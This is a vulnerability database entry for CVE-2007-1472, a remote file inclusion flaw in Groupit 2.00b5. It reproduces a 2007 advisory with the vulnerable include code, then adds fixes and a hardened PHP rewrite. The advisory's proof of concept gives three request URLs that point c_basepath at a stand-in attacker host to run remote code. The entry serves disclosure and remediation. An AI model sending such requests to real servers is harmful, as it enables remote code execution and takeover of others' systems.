Groupit groupit.start.inc Variable Overwrite Vulnerability

Vulnerability ID 1112456 Vulnerability type Code injection
Published 2007-03-15 Updated 2007-03-16
CVE ID CVE-2007-1472 CNNVD ID CNNVD-200703-394
Platform PHP CVSS score 6.8
|Sources
https://www.exploit-db.com/exploits/3486
https://www.securityfocus.com/bid/86557
https://cxsecurity.com/issue/WLB-2007030126
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-394
|Details
Groupit 2.00b5 contains a variable overwrite vulnerability in groupit/base/groupit.start.inc. Remote attackers can carry out remote file inclusion attacks and execute arbitrary PHP code via parameters written into $_GLOBALS, for example by supplying a URL in the c_basepath parameter of (1) content.php, (2) userprofile.php, (3) password.php, (4) dispatch.php and (5) deliver.php under html/, and possibly (6) load.inc.php and related files.
|Exploit
-------------------------------------------------------------------------------------
[ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
-------------------------------------------------------------------------------------

Author          : Dedi Dwianto a.k.a the_day
Date Found      : March, 15th 2007
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv75-theday-2007.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~

Application     : Groupit
version         : 2.00b5
URL             : http://fresh.t-systems-sfr.com/fresh/unix/src/privat2/groupit-2.00b5.tar.gz

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~

- Invalid include function at html/content.php
-----------------------html/content.php------------

<?
...
// $c_basepath is never assigned in this script; with register_globals
// enabled it is populated directly from the request, so every include
// below is built from attacker-controlled input.
include "$c_basepath/base/groupit.start.inc";

if (!empty($c_is_search))
{
  include "$c_basepath/modules/search/main.inc";
} else
{
  if ($c_is_section)
  {
     include "$c_basepath/modules/content/section.inc";
  } else
  .........

include "$c_basepath/base/groupit.stop.inc";
?>
----------------------------------------------------------

Input passed to the "$c_basepath" parameter in load.inc.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files:

html/userprofile.php
html/password.php
html/dispatch.php
html/deliver.php

and More ....



Proof Of Concept:
~~~~~~~~~~~

http://localhost/groupit/html/content.php?c_basepath=http://atacker.com/inject.txt?
http://localhost/groupit/html/userprofile.php?c_basepath=http://atacker.com/inject.txt?
http://localhost/groupit/html/password.php?c_basepath=http://atacker.com/inject.txt?

Solution:
~~~

- Sanitize the $c_basepath variable in the affected files.
- Turn off register_globals

---------------------------------------------------------------------------

Shoutz:
~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy Nice Girl
~ az001,bomm_3x,matdhule
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~
    EcHo Research & Development Center
    http://advisories.echo.or.id
    erdc[at]echo[dot]or[dot]id
    the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2007-03-15]
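The two fixes the advisory recommends, shown as a hardened rewrite of the html/content.php include pattern. This is an added example, not Groupit's own code, written for PHP 7+; it assumes html/ sits directly under the Groupit base directory and that c_is_search and c_is_section are request flags (the names groupit_safe_path and the flag handling are this example's own).

```php
<?php
// Added example, not Groupit's code: hardened rewrite of the include
// pattern from html/content.php. Assumes html/ sits directly under the
// Groupit base directory and that c_is_search/c_is_section are request flags.

// Fix 1: derive the base path from the script's own location. With
// register_globals on, an undefined $c_basepath is filled from
// ?c_basepath=..., which is exactly what the proof of concept abuses.
$c_basepath = dirname(__DIR__);

// Fix 2 (defence in depth for hosts where register_globals is still on):
// discard any request-supplied copy before anything can read it.
unset($_GET['c_basepath'], $_POST['c_basepath'], $_COOKIE['c_basepath'],
      $_REQUEST['c_basepath']);

// Request flags are read explicitly instead of relying on register_globals.
$c_is_search  = !empty($_GET['c_is_search']);
$c_is_section = !empty($_GET['c_is_section']);

// Resolve $relative against $c_basepath and return it only if the result is
// a real file inside the base directory. realpath() collapses "../" and
// returns false for URL wrappers (http://, ftp://, php://), so remote
// inclusion and traversal are both refused before include runs.
function groupit_safe_path(string $relative): string
{
    global $c_basepath;
    $base   = realpath($c_basepath);
    $target = realpath($c_basepath . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $target === false
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(500);
        exit('include refused: path outside application base');
    }
    return $target;
}

// include stays at file scope so the included files keep setting globals.
include groupit_safe_path('base/groupit.start.inc');

if ($c_is_search) {
    include groupit_safe_path('modules/search/main.inc');
} elseif ($c_is_section) {
    include groupit_safe_path('modules/content/section.inc');
}

include groupit_safe_path('base/groupit.stop.inc');

// php.ini settings that pair with this (the advisory's second fix):
//   register_globals  = Off   (directive removed altogether in PHP 5.4)
//   allow_url_include = Off   (PHP >= 5.2; blocks include of URL wrappers)
```

With these settings a request such as content.php?c_basepath=http://... no longer reaches include at all; if it did, realpath() would return false and the request would be refused with a 500.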
|Affected products
T-Systems Solutions for Research GmbH Groupit 2.00B5
|References

Source: XF
Name: groupit-cbasepath-file-include(33000)
Link: http://xforce.iss.net/xforce/xfdb/33000
Source: BUGTRAQ
Name: 20070315 [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/462918/100/0/threaded
Source: MILW0RM
Name: 3486
Link: http://www.milw0rm.com/exploits/3486
Source: VUPEN
Name: ADV-2007-0995
Link: http://www.frsirt.com/english/advisories/2007/0995
Source: VIM
Name: 20070315 [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
Link: http://www.attrition.org/pipermail/vim/2007-March/001436.html
Source: VIM
Name: 20070315 [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
Link: http://www.attrition.org/pipermail/vim/2007-March/001435.html
Source: SREASON
Name: 2428
Link: http://securityreason.com/securityalert/2428
Source: OSVDB
Name: 34476
Link: http://osvdb.org/34476